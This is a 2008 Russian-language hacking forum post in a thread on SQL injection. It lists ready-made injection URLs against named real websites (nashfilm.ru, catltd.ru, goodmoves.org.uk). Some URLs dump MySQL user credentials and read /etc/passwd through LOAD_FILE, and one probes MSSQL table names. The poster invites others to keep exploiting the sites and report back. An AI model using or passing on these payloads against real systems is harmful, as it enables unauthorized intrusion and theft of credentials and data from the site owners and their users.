Тема: SQL Инъекции
Показать сообщение отдельно

  #4297  
Старый 03.01.2008, 03:18
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию
MySQL Injection:
http://nashfilm.ru/index.php?option=rss_exporter&version=1&feed_id=-1+union+select+1,concat(user,password,host),3,4,5, 6,7,8,9,10,11,12,13,concat(USER(),VERSION(),DATABA SE()),15,16+FROM+mysql.user/*
http://nashfilm.ru/index.php?option=rss_exporter&version=1&feed_id=-1+union+select+1,2,3,4,5,LOAD_FILE(char(47,101,116 ,99,47,112,97,115,115,119,100)),7,8,9,10,11,12,13, 14,15,16/*
http://www.catltd.ru/prices.html?cg=-1+UNION+SELECT+1,2,3,4,USER(),6,7/*
БД 4, а жаль. Таблицы с лету подобрать не удалось. Если кто будет ковыряться, плиз отпишитесь о результатах .

MsSQL Injection:

http://www.goodmoves.org.uk/findajob/findajobdet.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES)--
 
Ответить с цитированием